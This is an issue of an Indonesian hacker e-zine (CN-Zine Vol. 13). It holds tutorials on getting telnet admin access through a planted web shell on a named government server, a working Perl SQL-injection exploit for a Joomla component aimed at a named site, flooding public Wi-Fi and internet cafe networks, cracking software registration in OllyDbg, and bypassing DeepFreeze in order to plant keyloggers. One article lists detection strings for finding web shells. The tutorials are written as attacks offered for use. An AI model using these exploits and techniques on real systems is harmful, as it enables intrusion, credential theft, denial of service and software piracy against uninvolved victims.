Issuu on Google+


CN-ZINE Apa itu CN-Zine? Majalah

online

hasil

karya

para

member

Codenesia

yang

dapat

diunduh/didownload secara gratis. Sejarah CN-ZINE (Codenesia Magazine) ? Kebutuhan akan informasi, artikel dan tutorial semakin banyak sehingga Komunitas Codenesia.com memutuskan untuk merilis sebuah magazine untuk komunitas IT di Indonesia. Tujuan dibuatnya codenesia Magazine? Saling berbagi ilmu, Menyebar luaskankan ilmu seputar Antivirus, Virus, Hacking, Crack, All of Computer untuk tujuan positif. Hak cipta / Lisensi : Seluruh

materi

codenesia

Magazine

dapat

didownload,

dibaca,

disebarkan secara bebas untuk tujuan bukan komersial(nonprofit), dengan syarat tidak menghapus atau merubah nama penulis. Distribusi Codenesia Magazine : Codenesia Magazine hanya boleh di download melalui link download counter

yang

disediakan

bertujuan

agar

Member

berkunjung

ke

Codenesia

oleh

website

Codenesia,

hal

dari

Codenesia

menjadi

aktif

dan

mengunduh

langsung

dari

ini untuk

server

codenesia. Contact Codenesia Magazine : YM admin codenesia (anharku ,hirin, ajrnea) info@codenesia.com

2


CN-Zine Vol. #13 “Segala isi materi dan tutorial di-dalam majalah elektronik ini adalah hak cipta dan tanggung jawab masing-masing penulis. Anda diizinkan untuk mempublikasi ulang tanpa se-izin dari masing-masing penulis dengan tanpa merubah nama dan atribut penulis�.

Diterbitkan secara online oleh : Codenesia.com

Redaksi : CN-CreW Ide dan Desain Cover : Hakz Layouter : anharku

Editor : A.M Hirin Distribusi : All Member Codenesia

02/03/2012 www.codenesia.com www.forum.codenesia.com

Build Indonesia With Code

3


DAFTAR ISI

 Pembuka………………………………………….……………………………………….…5  Mendapatkan Akses Telnet di Server Korban.…………………………………………..8  Scan Shell di Server………………………………..……………………………………..15  Kemudahan Exploit Joomla…………………………………..…………………………..18  DoS pada Jaringan Lokal…………………………………………..……………………..23  Crack PDF Password Pro……………………………………………………………..….27  Jebol DeepFreeze……………………………………………………………..…………..33  Register My Software……………………………………………………..……………….36  Trick SMS Spamming Gratisan…………………………………………………………..40  Menghilangkan Windows Genuine Advantage Validation Tanpa Tool………………45  Membuat Key Generator Sederhana…………………………………………………….47  Produk Codenesia………………………………………………………………………....52  BOOKS FOR SALE……………………………………………………..…………………53  CN-ZINE 1-12………………………………………………………………………………54  Partner & Group CN on Facebook –Twitter……………………………………………..55  Donasi……………………………………………………………………………………….56  Cara Kirim Artikel Untuk Cn-Zine Edisi Berikutnya…………………………………….57

4


PEMBUKA “Dedemit Maya” itulah sebutan untuk hacker maupun defacer di dunia maya. Mari menengok sejarah dedemit maya di Indonesia. Perkembangan komunitas hacker di Indonesia. Beberapa kelompok hacker legendaris Indonesia bermunculan, seperti hackerlink, anti-hackerlink, kecoa elektronik, echo ,jasakom, dan YogyaFree / X-code. Selain carding dan mencuri di Internet (sisi negatif ) ada banyak sekali sisi positif dari perkembangan teknologi komunitas hacker Indonesia, khususnya yang berkaitan dengan teknologi keamanan SERVER & Jaringan. Dari kelompok-kelompok hacker ini, beberapa tokoh dan ahli keamanan jaringan Internet Indonesia bermunculan. Nama S'to, Xnuxer, y3dips, Jim Geovedi menjadi legendaris di dunia bawah tanah Indonesia di tahun 2004-2006. 5 best hacker di indonesia diantaranya: S’to http://jasakom.com/sto/ Xnuxer http://xnuxer.or.id/ Jim Geovedi http://jim.geovedi.com/ Irvan http://irvan.or.id/ Y3dips http://y3dips.echo.or.id/ Kembali ke kata dedemit maya atau hacker menurut artinya Peretas (Inggris: hacker) adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. Peretas putih atau White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut. Topi putih atau peretas putih adalah pahlawan atau orang baik, terutama dalam bidang komputer, dimana ia menyebut etika hacker atau penetrasi penguji yang berfokus pada mengamankan dan melindungi IT sistem. Agar kita lebih terbuka melihat dunia “Hacking” mari kita cari tahu beberapa Hacker Legendaris Dunia: 1. Kevin Mitnick. Mitnick mungkin sinonim dari kata Hacker. Departemen Kehakiman Amerika Serikat masih menempatkan dia sebagai “Penjahat Cyber paling dicari di dalam sejarah Amerika Serikat”.Kepintarannya dan keberhasilannya sampai difilm kan di Hollywood dengan judul : Hacker Takedown. Mitnick memulai pekerjaannya dengan memanfaatkan kelemahan system Los Angeles Bus card system, sehingga dia bisa bepergian dengan gratis kemanapun.Mitnick adalah narapidana pertama dengan tuduhan menyusup ke Digital Equipment Corporation’s computer Software dan mencuri softwarenya. Mitnick kemudian memulai petualangannya selama dua setengah tahun dari kota ke kota,

5


dari pesisir ke pesisir. Dia mulai memasuki computer, mengacaukan jaringan telepon, mencuri data data rahasia perusahaan dan mengacaukan system keamanan dan pertahanan nasional AS. Jejaknya akhirnya bisa ditemukan oleh seorang expert hacker bernama Tsutomu Shimomura, sampai akhirnya dia dapat ditangkap. 2. Adian Lamo Lamo berhasil menyusup kedalam Microsoft dan The New York Times. Lamo hanya menggunakan koneksi internet di coffe shop, Kinko’s dan perpustakaan untuk mendukung perbuatannya sehingga dia menggunakan nickname “The Homeless Hacker”. Lamo seringkali menemukan kelemahan keamanan pada suatu system dan memanfaatkannya. Dia juga sering memberitahukan ke pemilik system tentang adanya kelemahan system keamanannya. Beberapa situs yang pernah dihack oleh Lamo adalah Yahoo!, Citigroup, Bank of Amerika dan Cingular. Lamo pernah dihukum kurungan rumah selama enam bulan dg 2 tahun masa percobaan ditambah denda sebesar USD 65000 karena melakukan pengacauan di system intranet The New York Times. Lamo sekarang bekerja sebagai public speaker dan memenangkan penghargaan “Award winning journalist” 3.Jonathan James Pada usia 16 tahun, James menjadi sangat terkenal karena dia adalah anak dibawah umur pertama yang dihukum karena hacking. Dia mengaku bahwa dia hanya ingin bersenang2 (having fun) dan menyukai tantangannya. James menyerang system keamanan di agency of the Department of the Defence of United States, dengan mencuri username dan password dari email2 yang sangat rahasia. “Prestasi” lainnya adalah hack NASA computers dan mencuri softwares seharga USD 1.7 juta. The Justice Departement Amerika pernah mengatakan bahwa software yg dicuri oleh James dr NASA adalah termasuk International Space Station's physical environment, untuk mengontrol temperature dan kelembaban di luar angkasa. NASA sampai harus men Shut Down seluruh system computernya yg menghabiskan biaya hingga USD 41,000. Saat ini James bekerja sebagai Computer security. 4.Robert Tappan Morris Morris adalah anak dari seorang scientist di National Security Agency yg bernama Robert Morris. Robert adalah pencipta dari Morris Worm. Worm ini diketahui adalah worm pertama yang menyebar di Internet. Karena aksinya tersebut dia menjadi orang pertama yang dituntut di tahun 1986 dengan UU cyber crime.Para ahli mengatakan sekitar 6000 computer system hancur karena aksi worms tersebut. Morris sekarang menjadi professor pengajar di MIT Computer Science and Artificial Intelligence Laboratory.

6


5.Kevin Poulsen Poulsen adalah hacker spesialis system line telepon.“Prestasinya� yang paling terkenal adalah melakukan penipuan digital terhadap stasiun radio KIIS-FM,memastikan bahwa ia adalah penelpon ke 102 dan memenangkan Porsche 944 S2. Dia ditangkap di sebuah supermarket, dan dihukum selama 5 tahun. Selama dia di penjara dia bekerja sebagai jurnalis dan dipromosikan sebagai senior editor dari Koran Wired News. 6.Linus Torvalds Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari \'LINUS MINIX\'. Sistem operasi Linux telah menjadi sistem operasi \'standar\' hacker. Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux. Beberapa Tokoh diatas mungkin bisa menginspirasi dan memotifasi diri kita untuk lebih mengembangkan kemampuan IT kita. Kembali ke Perkembangan kamunitas hacker, Akhir-akhir ini Perkembangan komunitas hacker kian pesat terbukti dengan bermunculannya komunitas-komunitas hacker diantaranya: IndonesianCoder (IDC), IndonesianHacker (IH), Devilzc0de (DC),Hacker-Newbie (HN), BinusHacker (MH), MuslimHacker, TheTarget, HackerCisadane, PalembangHackerlink (PHL), dll Indonesia memang beragam dan memiliki wilayah dari sabang sampai merauke begitu pula dengan kualitas SDDM (Sumber Daya Dedemit Maya) nya, itulah yang menyebabkan banyak bermunculanya komunitas-komunitas hacker di dunia underground masing-masing ingin menjadi pemimpin dalam sebuah komunitas dan mengembangkan komunitasnya hinga menjadi komunitas yang besar dan diakui oleh komunitas lainya. Namun kesemua komunitas tersebut masih dalam Kesatuan NKRI (Negara Kesatuan Republik Indonesia). Codenesia juga merupakan komunitas besar namun BUKAN komunitas hacker karna codenesia bermula dari sharing mengenai code-code baik antivirus maupun virus. Namun seiring perkembangannya mungkin ada juga netter yang mengangap codenesia sebagai komunitas hacker karena banyak artikelartikel bernuansa hacking yang di posting baik di forum maupun di Majalah Online seperti CN-ZINE ini.

-redaksiReferensi: http://id.wikipedia.org/wiki/Peretas_topi_putih http://id.wikipedia.org/wiki/Black_hat_hacker

7


Mendapatkan Akses Telnet di Server Korban By: j0ck3r Pada kesempatan kali ini saya mencoba menulis tentang hacking yang cupu abis,dimana kita mendapatkan akses ke computer korban via telnet. Disini saya praktekkan langsung ke sebuah web pemerintahan dimana saya telah menanamkan shell backdoor disana dan server nya menggunakan windows .Tentu rekan-rekan semuanya tahu kan gunanya shell backdoor macam c99,b374k,dll,yaitu untuk jalan masuk kita apabila user dan password admin diganti sama empunya web..he hehe he,nah gimana kalau ternyata shell backdoor itu juga dihapus ma admin??waaaa…gak punya jalan masuk lagi dunk ,eitss..tenang kita bisa lakukan cara yang akan saya sebutkan setelah ini… Pertama (saya anggap temen-temen semua udah bisa masuk ke server korban entah menggunakan tehnik SQL,LFI atau tehnik lain yang udah sering di share) setelah kita masuk ke kompie korban,segera tanam shell kita,disini saya menggunakan shell b473k,lalu kita pilih “Shell” dan ketikkan perintah net user j0ck3r j0ck3r /add dan klik “go”

8


Penjelasan perintah diatas adalah dimana kita menciptakan user baru dengan nama “j0ck3r” dan password “j0ck3r”,ini gunanya untuk login kita nanti… Setelah itu kita masukkan lagi perintah net localgroup administrator j0ck3r /add dan klik “go”

Maksud

dari

perintah

diatas

adalah

kita

menambahkan

user

“j0ck3r”

kedalam

group

administrator,sehingga kita masuk sebagai admin  Setelah itu ketikkan perintah net start telnet lalu klik “go” untuk mengaktifkan telnet di computer korban,jaga-jaga aja sapa tahu service telnet nya gak aktif..he he he he

9


Ok deh,sekarang kita test,buka CMD rekan-rekan semua dan ketikkan telnet ( Ip korban ) disini korban saya mempunyai Ip 202.43.189.41

10


trus enter deh dan kita tunggu sebentar agar koneksi terjadi dan setelah tercipta koneksi kita pilih “yâ€? dan login dengan user dan password yang udah kita ciptakan tadi‌

maka di cmd saya akan tertulis telnet 202.43.189.41

11


trus enter deh dan kita tunggu sebentar agar koneksi terjadi dan setelah tercipta koneksi kita pilih “yâ€? dan login dengan user dan password yang udah kita ciptakan tadi‌

12


Bingooo‌.kita udah sukses masuk ke computer korban,cek aja deh isi komputernya‌

13


Hehehe dari sini kita bisa melakukan sesuka hati kita,mau delete,edit,dll,jadi meskipun akses ke shell backdoor kita dah ilang,kita masih punya jalan lain he he he he.Sekian tulisan basi dari saya,bila ada salah kata atau kekeliruannya saya mohon maaf yang sebesar besarny,makasih buat orang-orang yang selama ini sudah membantu saya ( baik langsung maupun tidak langsung ) berkembang di dunia yang saya

senangi

ini,om

kurniawan,

poni,

tabun,

dev4,

x-cisadane,

wilmar-kidz,

andri

priyatna,anharku,civo,t3k0,septono huang dan orang-orang yang gak bisa saya sebutkan satu-persatu disini‌ God Bless u friend ď Š Nick: danang a.k.a j0ck3r

Contact: email : rocket.metal@yahoo.com blog : http://j0ck3r-maniax.blogspot.com

14


Scan Shell di Server By: anharku

Apa itu Shell atau backdoor itu? Shell atau Backdoor adalah pintu belakang, dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Pintu belakang ini biasa digunakan para Attacker untuk mengakses kembli website yang telah di deface / ditembusnya tanpa harus mengulangi proses eksploitasi bug’s system. Nah Website kamu pernah kena deface kan? Terus Gimana cara menghilangkan shell / backdoor yang disebunyiin oleh attacker? Apa kamu menghapus seluruh file diserver dan membuat website baru? Wagh itu cara kuno.. kelamaan… ada cara lain yaitu dengan menscan satu persatu file yang dianggap sebagai “malicious code,code injections, shell & backdoor” Prinsip scanshell ini adalah melihat isi code tiap file yang ada di server jika di dalam file tersebut terdapat sting :’ /`.+`/',/hacked by/' , '/c99/', ‘/r57/’, /base64_decode/,/shell_exec /,/system/,/passthru/, dst berarti file tersebut dianggap malicious / file berbahaya lalu kemudian hasil scan tersebut ditampilkan semua dalam sebuah list. Lanjut preketek, eh salah praktek cuy… Misalnya saya sudah bisa masuk ke sebuah server web , dengan POC blablabla cari sendiri di www.exploit-db.com atau http://1337day.com/ .lalu kita akan mencari siapa yg sudah masuk duluan ke web yang telah berhasil kita dapatkan ini. Apa aku yg merawani? Atau bukan? 

15


Lalu upload scanshell.php ke dalam server tersebut, lalu buka scanshell.php tersebut

Setelah di cek ke alamat tersebut ternyata yg duluan masuk om aan a.k.a anz ,duh dagh ga perawan nih… Dagh di mbat sama Temen sendiri dagh… 

16


Coba kita lihat shellscan tadi satu persatu pencarian shellnya , kita cari shell om aan dimana letaknya??

Om aan nyembunyiin shellnya dalem banget folder nya, mungkin biar ga ketahuan kale ya kalo dalem2 nyembunyiinnya di directory /templates/ja_purity/styles/elements/black/anz.php Tapi tetep ketahuan berkat scanshell ini hhhhh….. Hm.. dah tahu kan gimana manfaat scanshell ini soal codenya ga usah ku jelasin ah ribet banget codenya, aku aja cuma recoding hehehe…  Ingat jika website kamu kena deface scan aja semua shellnya terus delete aja. Tapi jika kamu kurang yakin dengan scanshell ini ya terserah hapus saja semua file yang ada di server kamu (root# rm –rf *) lalu buat ulang web kamu dari awal dengan cms / code2 yang lebih secure. Download scanshell : http://s-m.no/sc4nsh3ll.txt “mencegah lebih mudah dari pada mengobati dan merusak lebih mudah dari pada membuat hhh ” To Hakz : HBD Panjang Umur dan Sukses Selalu :p~ Thanks to: Member Codenesia,YF/ X-CODE,IH, HN, DC and INDONESIANCODER By: anharku a.k.a r13y5h4 http://anharku.net

17


Kemudahan Exploit Joomla By: J0ck3r

Ok, pada tulisan kali ini saya cuma ingin menunjukkan kemudahan sebuah exploit pada bug‟s joomla, JOOMLA?? Yup,joomla..salah satu cms yang banyak penggemarnya,kenapa saya beri judul “KEMUDAHAN EXPLOIT JOOMLA“ karena memang sangat mudah,hanya cukup mengetik 2-3 perintah dan enter maka target sudah didapat hasilnya. Kali ini kita akan menyerang joomla dengan salah satu bug‟s nya yaitu komponen lowcosthotel..kita tidak akan melakukan serangan SQL yang rumit,harus mencari table,colom dan lain lain.Semudah itukah??yup,kita langsung serang ke “jantung” nya..siapkan peralatan perang: 1. Computer 2. Active Perl versi berapa saja 3. Notepad Pertama buka browser anda semua,dan masuk ke paman gugel,lalu ketikkan dork inurl:com_lowcosthotels dan pilih salah satu target yang menurut anda “tepat”.

18


Lalu copas script dibawah ini dan simpan dalam nama low_cost.pl lalu copas ke direktori tempat kita menginstall active perl,biasanya di C:\Perl\ #!/usr/bin/perl #Joomla com_lowcosthotels Sql injection# ######################################## #[] Author : Lovebug #[] www.rbt-4.net #[] Module_Name: com_lowcosthotels #[] Script_Name: Joomla ######################################## use LWP::UserAgent; print "\n Target : http://wwww.site.com/path/ : "; chomp(my $target=<STDIN>); $cn="concat(username,0x3a,password)"; $table_name="jos_users"; $br = LWP::UserAgent->new() or die "Could not initialize browser\n"; $br->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host

=

$target

.

"/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+union+select+1,".$cn. "+from/**/".$table_name."--";

19


$res = $br->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; } else{print "\n[-] Exploit failed.\n"; } Lalu kita buka cmd dan panggil script kita tadi dan masukkan alamat web yang akan kita serangâ&#x20AC;Śkali ini saya beri contoh http://gayres.eu dan enter..

20


Sembari nunggu kita bisa memutar music kesayangan kita,bila belum di patch,maka akan muncul Admin hash nyaâ&#x20AC;Ś

21


Bila sudah dipatch maka akan muncul seperti ini….

Sekarang tinggal tugas kita mencari alamat login nya,dan meng crack passwordnya,biasanya username nya masih default kok,yaitu admin atau administrator .Selamat mencoba.don‟t be evil  Nick: danang a. k.a j0ck3r About Me: penulis adalah lulusan universitas yang gak terkenal jurusan Management Akutansi,sekarang bekerja di salah satu perusahaan swasta yang bergerak di bidang makanan bagian PPIC ( Plan Production Inventory Control ),aktif ( eh tepatnya sih cuman jalan-jalan doank :p ) di beberapa forum hacking,termasuk terlambat mendalami dunia IT  penulis bisa di hubungi di email dan blog penulis. Thanks to Allah Swt║Muhammad SAW║My Father║My Mother ||XCode║Codenesia║Devilzc0de║BorneoCrew||All people

22


DoS pada Jaringan Lokal By: X-Cisadane Salam sejahtera para pembaca sekalian, kali ini penulis akan mensharing sebuah tutorial yang mungkin masih sedikit dari kita yang tahu. Kali ini penulis akan membahas mengenai DoS pada jaringan lokal, karena ini DoS (Denial of Service) maka kita hanya memerlukan satu buah perangkat saja untuk menjalankan aksi ini, dan apa yang penulis share pada tutorial ini hanya berlaku pada jaringan Local Area Network saja (bisa Wireless LAN ataupun Wired LAN) dengan kondisi Internet aktif pada Local Area Network. Mungkin yang ada di benak pembaca akan berbeda dengan apa yang tertulis pada tutorial ini. Denial of Service yang penulis bahas di sini merupakan jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya untuk menikmati layanan yang diberikan Server, Server di sini mungkin Server yang mengatur Network yang kita pakai. Yang namanya Server pastinya harus selalu siap sedia melayani permintaan (Request) para Client selama 24 jam atau waktu yang telah ditentukan. Serangan Denial of Service yang kita lakukan ini terbilang cukup sederhana dan mematikan, pasalnya kita dapat mengirim Packet yang dapat mempengaruhi lalu lintas jaringan. Tapi serangan ini tidak bersifat permanen, dalam artian jika kita menghentikan serangan maka kondisi lalu lintas jaringan akan kembali normal. Bisa pembaca bayangkan sendiri jika pada area HotSpot gratis suasana yang ramai penuh canda tawa dan kerumunan orang-orang yang sok sibuk mantengin leptop yang ada logo â&#x20AC;&#x17E;apel digigitâ&#x20AC;&#x; tiba-tiba berubah drastis, saat mereka sedang asiknya berselancar di dunia maya koneksi mereka semua pun terputus. Bahkan yang sedari tadi menggunakan piranti ARP Spoofing & ARP Poisoning-pun ikut-ikutan terputus. Penulis sudah pernah melakukan aksi DoS ini pada HotSpot gratis di Depok Town Square, nyatanya tidak ada satu orangpun yang dapat Browsing saat penulis melakukan aksi ini dan bahkan penulis-pun tidak bisa melakukan Browsing & Download-download ď &#x152; Selain itu warnet-warnet yang sering penulis kunjungi juga bisasanya menjadi sasaran kejahilan penulis, saat koneksi di warnet terasa lemot (mungkin banyak yang Download-download & Streaming Bokep) di saat itulah penulis melakukan aksi ini dan membubarkan aktifitas Download-mendownload & Streaming yang dilakukan oleh Client lain. TAPI saat penulis melakukan aksi DoS pada area HotSpot kampus, sama sekali TIDAK WORKING!!! entah mengapa??? Apa mungkin karena ada Mikrotiknya??? Squidnya??? Atau??? Dan penulis tidak

23


menanggung segala resiko apapun yang ada dalam tutorial ini, penulis harap ini hanya sebagai bahan pembelajaran bagi kita semua!

PEMBAHASAN : Oke sekarang kita akan masuk ke pembahasan, dalam melakukan DoS pada jaringan lokal penulis menggunakan NetTools Packet Generator, ini berada pada satu paket Installasi Software NetTools 5 (Bisa di download di sini : http://mabsoft.com/nettools.htm). Oke anggap saja semuanya sudah dipersiapkan, sekarang buka cmd (Command Prompt) dan ketik ping google.com dan tekan enter, tunggu sampai proses Ping selesai. Biarkan jendela Command Prompt tetap ada (jangan di close). Ini kita lakukan sebagai bahan perbandingan.

Gambar 1 : Kondisi sebelum di DoS Lanjut kita jalankan Packet Generatornya, masukkan IP or Hostnya 203.130.231.123, Remote Port : 80, Pre-Defined : GET, Danger Packet : D.O.S GET:AChar*2100byte, Speed of Transmissions geser slide hingga ke ujung kanan, agar lebih jelas silahkan ikuti gambar di bawah ini :

24


Gambar 2 : Melakukan DoS menggunakan Packet Generator Jika semua sudah sama seperti di atas, silahkan pembaca klik Start Flood. Tunggu 3 detik, Minimize Packet Generatornya, kemudian buka cmd (Command Prompt) dan ketik ping google.com dan tekan enter, tunggu sampai proses Ping selesai. Jika hasilnya buruk seperti ini (Time nya lebih dari 1000 ms) itu artinya kita berhasil.

Gambar 3 : Kondisi saat di DoS

25


Jika hasil PINGnya seperti pada gambar di atas, maka sudah dapat dipastikan akan LoLa (Loading Lama) saat melakukan Browsing, wokwokwok… Bahkan yang tadinya sedang asik Download-mendownload langsung turun kecepatan Mendownloadnya. Mungkin jika di sebuah Network ada yang sedang memakai ARP Spoofing atau bahkan ARP Poisoning bisa kita lakukan cara ini agar si pengguna ARP Spoofing atau ARP Poisoning tersebut tidak bisa ngenet 

PENUTUP : Mudah-mudahan apa yang penulis paparkan di sini dapat menjadi bahan pembelajaran. Dan yang kita lakukan ini merupakan satu dari sekian banyak kejahatan di dunia maya. Semoga kita dapat mengambil hikmahnya atas apa yang penulis berikan dalam tutorial kali ini. Penyalahgunaan, Penggunaan dan Segala macam resiko dalam praktik tutorial ini, diluar tanggung jawab penulis!. Akhir kata “Tak ada gading yang tak retak” penulis mohon maaf jika ada kesalahan dalam penulisan artikel ini. - Dwi a.k.a Kali Cisadane (X-Cisadane) –

BIOGRAFI PENULIS : Dwi atau Kali Cisadane (X-Cisadane), setelah menamatkan pendidikan Sekolah Menengah Atas, kemudian melanjutkan pendidikannya di Perguruan Tinggi Swasta jurusan Sistem Informasi di Universitas Gunadarma Depok, Indonesia. Sebagian besar, ilmu yang dimilikinya di dapat dari dunia maya dan dari penelitiannya yang secara otodidak. Penulis juga aktif dalam beberapa Forum Diskusi yang membahas Dunia Underground seperti : XCode, BorneoCrew, DepokCyber, Cisadane Hacker Community, Muslim Hackers, Dunia Santai dan yang lainnya. Contact : stefanus_dp@ymail.com.

26


Crack PDF Password Pro By: Doc’sCod3 Tools Needed: 1. OllyDbg 2. PEiD 3. Unpacker Just like usual, let’s check this baby protection 

Proteksi pada PDF Password Cracker Pro

Ehhmm, ternyata pake proteksi UPX…oke, mari kita unpack dulu sebelum masuk proses cracking Udah pada bisa unpacking kan, silahkan di unpack dulu, saya tunggu..!!! Klo sudah, bilang ya…

Di sini saya

menggunakan unpacker plugin yang saya tambahkan pada PEiD

27


Now, fire up Olly and rock onâ&#x20AC;Ś!!! Load program yang sudah di unpack tadi ke olly

Jalankan programnya (F9), isikan sembarang registration key

Ingat / catat kalimat error pada kotak dialog registrasi

28


Restart program (Ctrl+F2), lalu klik kanan – Search for – All referenced text strings, maka akan muncul window baru dengan banyak kalimat string Klik kanan – Search for text, lalu ketik kalimat error yang tadi muncul saat registrasi

Coba liat di atas string yang error tadi ada string yang kayanya enak dipandang tuh Langsung sorot, klik kanan – Follow in Disassembler (Enter), maka kita akan dibawa ke window CPU lagi Amati sebentar alur programnya….ada sesuatu yang menarik nggak? Let’s take a look

Pasang breakpoint di sini (F2)

Conditional Jump

Command yang mempengaruhi conditional jump

29


Kita lihat disana ada command test eax,eax (Classic method , huh?) nilai eax inilah yang nantinya akan mempengaruhi loncatan pada command di bawahnya yaitu JE (Jump if Equal) Jika nilai eax = 0, maka loncatan akan di ambil, yang artinya program akan melewati string “Thank you...” atau istilahnya unregistered Jika nilai eax = 1, maka loncatan tidak akan diambil, yang artinya program akan terus berjalan sampai string “Thank you…” dengan kata lain program telah teregistrasi Udah tau kan tujuan kita apa? That’s right, let’s go to Bali …oops…sorry… Maksudnya, kita akan memodifikasi nilai eax dari 0 (unregistered) menjadi 1 (registered) Let’s begin…!!! Sebelumnya kita pasang breakpoint (F2) dulu di alamat 00407914 pada command call, karena kemungkinan di sini nilai eax itu bisa kita rubah well, continue our investigation Jalankan programnya (F9), dan program berhenti di breakpoint yang sudah kita pasang tadi, tekan F7 untuk step into, maka Olly akan menampilkan proses yang ada pada command call…tekan F8 untuk step over

30


This is the place to patch 

Nilai al = 0

Setelah kita sampai pada command repne scas byte ptr es:[edi]  nilai al = 0, jadi di sinilah kita akan melakukan cracking Klik kanan – Assemble (Space), ubah command repne scas byte ptr es:[edi] menjadi mov eax,1

Klik kanan – Copy to executable – All modifications, klo ada pilihan lagi, klik copy all

31


Klik kanan – Save file, simpan dengan nama crackpdf1.exe Sekarang coba jalankan program yang sudah kita modifikasi tadi

No more annoying Nag Screen, right? Final step, hapus crackpdf.exe, lalu rename crackpdf1.exe menjadi crackpdf.exe

This Tutorial is made for Educational purpose only “Positive thinker always looks on the Bright Side”

By:

Rangga s. n. relaxation_tea1922@yahoo.com

32


Jebol DeepFreeze By: DNZ “ARTIKEL INI TIDAK BERMAKSUD MENJELEK-JELEKKAN SUATU PRODUK HANYA MEMBERITAHUKAN BAHWA SOFTWARE INI MASIH MEMILIKI KELEMAHAN / BUGS” Dagh teu deepfreeze kan? Sopwer yang biasa buat ngembaliin system ke keadaan semula, keadaan waktu diinstal deepfreeze. Deepfreeze ini biasanya dipasang di warnet2 karena warnet tu ga mau repot2 ini itu install ulang karna kena virus dari user / pelanggan warnet tersebut.

Software untuk hack deepfreeze ini namanya deepfreeze 6.X Pass Remover , sopwer ini gue dapet dari forum HN , yg bikin sopwer ini salah satu member HN ,nicknya mydisha. Sebenernya banyak cara buat jebol deepfreeze tapi kita cari cara yg paling prktis aja ya oke?

33


Lanjut cara pakainya tinggal klik duax sopwer mydisha ini maka akan keluar tampilan berikut.

Klik Remove Password, maka akan keluar pesan â&#x20AC;&#x153;Finish Deleting DeepFreeze Passwordâ&#x20AC;?

34


Lanjut kita tekan kombinasi keyboard untuk memunculkan kolom password deepfreeze seperti biasa tekan CTRL+SHIFT+ALT lalu F6 (Tekan secara bersamaan). Ga usah isi password cukup tekan ok maka sudah langsung jebol.. 

Tinggal matiin deepfreeze nya dengan memilih BOOT THWED, atau setting password baru lalu restart biar deepfreeze nya mokad. Lanjut setelah deepfreeze mati lo mau apa aja di kompi warnet itu serah lo deh, mau passing keylogger buat curi e-mail, username, password, dll terserah tanggung sendiri dosanya.

“USER OWN RISK” Thanks to: mydisha Salam MeTaL Keep Roxxxx…… \m/ (by : DNZ a.k.a Dede_NZ| BantenCracker)

35


Register My Software By: M. ALIM.S.A.N Hai Semua ... Para Reader Setia CN-Zine... Munkin Kalian Semua Bingun Siapa Saya, Perkenalkan Nama Saya M.ALIM Saya Seorang AV Maker Yang Sangat Mencintai Produk” Lokal Dan Sangat Bangga Bergabung Di Codenesia Family... ,, Pada CN-Zine Ke 13 Ini Saya Ingin Memberikan Ilmu Sederhana Buat Kawan” Ku Yang Ingin Menggunakan Teknik Trial Soft..., Maaf Sebelumnya Jika Artikel Dan Penjelasan Dari Saya Kurang Di Pahami... GET Started:

Pada Gambar Di Atas Saya Menggunakan Component Rich Text box (RICHTX32.OCX) Ada Alasan Tertentu Saya Menggunakan Komponent Tersebut Karena’ ... Rich Text Box Bisa Di gunakan Untuk Menyimpan Data Yang Di Setting Sesuai Dalam Code’. Code Ini Sangat Sederhana Menggunakan Code Load Dan Save Sajah. Misalkan Codenya Seperti INI:

36


Form 1 Private Sub Form_Load() TextBox3.LoadFile "names.INP" ‘Load File User Name On Your Data textbox1.LoadFile "password.INP" ‘Load File User Name On Your Data If textbox1.Text = "INPAG99" Then ‘ Jika Udah Di Regiter Dan Udah Di Save Langsung Direct Ajah Me.Hide mainfrm.Show ‘Dari Direct Kalo Udah Load pass Dari Save PATH ElseIf textbox1.Text = "Power99" Then ‘Code Lain Untuk Save Pass Baru Me.Hide mainfrm.Show ‘Dari Direct Kalo Udah Load pass Dari Save PATH ElseIf textbox1.Text = "GAWEIN77" Then ‘Code Lain Untuk Save Pass Baru Me.Hide mainfrm.Show ‘Dari Direct Kalo Udah Load pass Dari Save PATH Else Me.Show ‘Belum Di Register End If End Sub ‘Teknik Comand Di Tombol Private Sub Command1_Click() If textbox1.Text = "INPAG99" Then TextBox3.SaveFile "names.INP" textbox1.SaveFile "password.INP" MsgBox "Thank you for Reg. this software", vbInformation, "INP" Unload Me mainfrm.Show ElseIf textbox1.Text = "Power99" Then TextBox3.SaveFile "names.INP" textbox1.SaveFile "password.INP" MsgBox "Thank you for Reg. this software", vbInformation, "INP"

37


Unload Me mainfrm.Show ElseIf textbox1.Text = "GAWEIN77" Then TextBox3.SaveFile "names.INP" textbox1.SaveFile "password.INP" MsgBox "Thank you for Reg. this software", vbInformation, "INP" Unload Me mainfrm.Show Else MsgBox "

XXX

Invalid key

XXX

Try again XXX ", vbOKOnly, "INP"

End If End Sub Private Sub Timer1_Timer() ‘ Unregister If textbox1.Text = 1 Then Me.Hide Form2.Show Else Me.Show End If End Sub Form2 Private Sub Command1_Click() If Text1.Text = "INPAG99" Then MsgBox " Your Softwrae has been Unregister ", vbOK, "INP" TextBox2.Text = ""

38


TextBox2.SaveFile "password.INP" End Else MsgBox "

XXX Invalid Key

XXX Try again XXX "

